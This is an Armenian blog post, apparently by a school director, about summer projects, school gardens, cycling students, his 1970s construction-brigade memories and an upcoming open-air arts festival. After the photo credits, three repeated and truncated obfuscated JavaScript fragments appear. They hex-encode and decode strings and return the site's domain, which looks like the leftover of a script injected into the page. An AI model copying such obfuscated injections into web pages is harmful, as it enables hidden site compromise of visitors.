Այո՛, ընդհանուր պարապմունքը կարող է և կլինի Երերույքի տաճարում մայիսի 21-ին՝ ժամը 9.30-9.45, «Գեղարվեստը կրթահամալիրում» նախագծի մասնակիցների և Անիպեմզա համայնքի գյուղի բնակիչների, սովորողների և ուսուցիչների մասնակցությամբ: Կարող է և եղավ որպես կլոր սեղան-առաջադրանք կրթահամալիրի Քոլեջում, երեկ՝ 9.10-9.30… Մինչ այդ ես հատիկ-հատիկ ստուգում էի, սրանից հետո՝ հե՛նց հատիկ-հատիկ, յուրաքանչյուր մեր դպրոցում, ծառ-թփերի ջրված լինելը, խոտի խուզված լինելը, պարտեզի մաքուր խնամված լինելը՝ հետաքրքիր ամառային բաց միջավայրի զարգացումը, ամեն մի դրսևորում… Գոհ մնացի: Ամառն իր իրավունքների մեջ է, ու ճամբարական երկրագործ սեբաստացին՝ բոլոր տարիքների սովորող թե ուսուցիչ, արևի ու ջրի կենարարությամբ պիտի կրթական պարտեզների-դրախտային այգու հրաշագործությունը ցուցադրի… Քոլեջի ուսանողներին ես կարճ պատմեցի ուսանողական շինարարական ջոկատներում 1972-1977 թթ իմ հնգամյա գործունեությունը իմ համալսարանական ընկերների հետ, Ղազախստանից Մուրմանսկով, ոչ սևահողային Ռուսաստանով (Մարի Էլ) մինչև Մագադան-Չուկոտկա… Ինչու մենք կարո՜ղ էինք «Мой адрес Советский Союз» երգով ուսանողի ամառային արձակուրդներին կառուցել տներ, գոմեր, գործարաններ սովետով մեկ… իսկ սեբաստացի պատանի ուսանող-սովորողները չե՞ն կարող իրենց կրթահամալիրի Բանգլադեշում ձիանոցն ավարտի բերել, ջերմոցներ ու գյուղացիական այլ տնտեսություն հիմնել, «Կրթական պարտեզ» նախագծով հեծանվային անցումներ ու հանգստի գոտիներ կառուցել… Գիտեք, չէ՞, մեզ հունիսին մեզ միանում են նաև մեր գործընկերները՝ Ճարտարապետության և շինարարության Հայաստանի ազգային համալսարանից ուսանողներ, ճարտարապետ-դասախոսներ… Այո՛, արդա՜ր քրտինքով հունիս-օգոստոսին փող աշխատել, Բանգլադեշյան պլեների ակտիվ մասնակից լինել, իսկ աշխատած փողով ամառային ճամփորդություն կազմակերպել կամ հեծանիվ գնել… Օրն ամառվա՝ էլի քսանչորս ժամ, բայց առտու վեցից իրիկունն ութը տասնչորս ժամ պայծառ լույս ու ստեղծական աշխատանքի հավես-հնարավորություն… Պատմե՞լ եմ, օրեր առաջ գյուղացիական տնտեսությունում տեսա շինջոկատների ծիծեռնակ խմբին. Միջին դպրոցի մի խումբ տղաներ ժամը երեքի-չորսի արանքում, ի՜նչ խաղաղ-տպավորիչ ջերմոցի հողն էին մշակում… Սկսել է, պիտի սկսվեր… Անտեր-անմշակ որքա՜ն հող կա Բանգլադեշում… Ա՛յ, սրա համար կռիվ տվեք, մշակեք, ետ բերեք տասնյակ տարիներ կորսված մեր հեկտարներով հողերը…

Մարզվում են Նոր դպրոցի 2-րդ դասարանցիները:
Լուսանկարները՝ Արմինե Մնացականյանի:

Նոր դպրոցում հեծանվով ժամը 9.00-9.10 իմ ուղերձը երեկվա իմ գրի բովանդակությունն էր… Քանի՞ րոպեում է Նոր դպրոցի սովորողը-ուսուցիչը Բաբաջանյան պողոտայից հասնում Նոր դպրոց, Նոր դպրոցից՝ Դպրոց-պարտեզ կամ տնտեսություն, հետո՝ Հիմնական դպրոց… Ինչո՞վ, ինչպե՞ս… Վազքով, իհարկե, հեծանվով, համեցե՛ք, ինչպես Նոր դպրոցի չորրորդ դասարանցի Նարեկը Գրիգորյան՝ իսկական սեբաստացի, տնից դպրոց, դպրոցից տուն՝ հեծանվով, խնամված, հեծանվորդի իր արդուզարդով… Սկսել եմ սեբաստացի տիրոջ հետ նրա ուսապարկի պարունակությունը ուսումնասիրել…

Ձեր ամառն է՝ սքանչելի իննսուներկու օր, և դուք հիմա պատրաստվո՞ւմ եք մեկնարկի. բարձունքների նվաճումը կարևոր հարթակ է այդ պատրաստության, իսկ մայիսի 30-ին, երբ զանգի պարտադրանքով դասի, դպրոց քշվածները փախչում են, պրծնում, մենք սկսում ենք «Ջա՜ն, ամառ» հավեսի նախագծերը… Ամենամեծ կարողությունը կյանքի դպրոցի, նրա սովորողի-ուսուցչի, հենց իր կյանքի կազմակերպումն է՝ անընդհատ ու գրավիչ, ապրելու-ստեղծումի մշտական հավեսով…

Դպրոց-պարտեզի 6 տարեկանները:
Լուսանկարները՝ Արմինե Գյոնջյանի:

Նշանավոր Կամենդատյաններից Լիդիան իր ընկերների հետ շփոթված էր. նամակ են գրել Իվետա Մուկուչյանին ու խնդրել, որ գա կրթահամալիր, անհապաղ արձագանք չեն ստացել… Իսկ դուք, Լիդիա, ձեր ձեռքին Բանգլադեշատեսիլն ունե՞ք, ոչ պակաս, քան Եվրատեսիլը՝ Շվեդիայում, Ստոքհոլմում, որ անցավ, որ այնքան վարպետությամբ-շնորհքով օգտագործեց Իվետան՝ հայտնի դառնալու համար… Բանգլադեշյան հունիսյան պլեներն իր երաժշտական, թատերական, կինո-ֆոտո, թարգմանական, սթրիտ-արտի փառատոներով ի՞նչ պակաս հարթակ է ձեր, ձեզ ծանոթ-անծանոթ հասակակիցների ինքնարտահայտման-ինքնահաստատման համար, այնպես, որ ոչ միայն Իվետան, այլև Նազենի Հովհաննիսյանն ու մյուսները չկարողանան շրջանցել Բանգլադեշը… Ձեզ բոլորիդ, սիրելինե՛ր, արևի սնուցումն է պակաս, ամառային ջրի թարմությունը և… գործուն ինքնավստահությունը… անխնա արարումը… Այսպիսի՜ ամառ… Իսկ Դավիթ Բլեյանը կատարեց իր խոստումը մեր պատշգամբում աճեցած առաջին վարդերը խնամքով ընտրեց ու տարավ իր դաստիարակներին՝ ընկեր Ռուզանին ու ընկեր Շողիկին։ Տղա՜ է մեծանում…

Լուսանկարները՝ Արմինե Աբրահամյանի:

Ֆոտոխմբագիր՝ Անահիտ Հարությունյան
# 675// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ashotbleyan.mskh.am"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ashotbleyan.mskh.am"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ashotbleyan.mskh.am"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Թողնել պատասխան

Ձեր էլ-փոստի հասցեն չի հրապարակվելու։ Պարտադիր դաշտերը նշված են *-ով

Explore More

Սիրո և արարման դրսևորումներ կյանքի, մահից առավել մութ ու խորո՞ւնկ

Հաղթական կամարով կրկին անցա օրեր առաջ, երբ ուսումնասիրում էի Սեբաստիա-Բագրատունյաց փողոցների անցումով-կամրջով-մուտքերով արված կանաչ ձևավորումները՝ լանջերի, բլրակների, պուրակների, ծաղկանոցների տեսքով… Դեպի գերեզմանոց՝ «Եռաբլուր» զինվորական պանթեոն, Արցախի ազատամարտում զոհվածների, առանձին մասնակիցների թաղման

Գիր է՝ բաց-մասնակցային, մտքերի, հայացքների, ճաշակների փոխանակում…

Աստղիկն ամեն անգամ ուժգնացող ճղղոցով գցվում է դեպի Դավիթը ու… բռնում եղբոր գիսախռիվը, բաց չի թողնում… Դավիթ Բլեյանը Աստղիկ քույրիկին դիմում է միշտ փաղաքշական՝ «գոճի՜» կամ «ճուտ-ճուտանի-անպիտանի», ամենանուրբ, զգույշ վերաբերմունքով,

Ես գրում եմ իմ լավագույն օրվա՝ այսօրվա մասին

Թե ինչքան դեղձ կերանք կրթահամալիրում մի օրում և ինչ եղան դրանց կորիզները՝ ով կհաշվի ու կպատմի… Ինչ կերել եք, անուշ լինի, իսկ այ, կորիզները, որ մեր դեղձենու տնկարանները պիտի դառնային,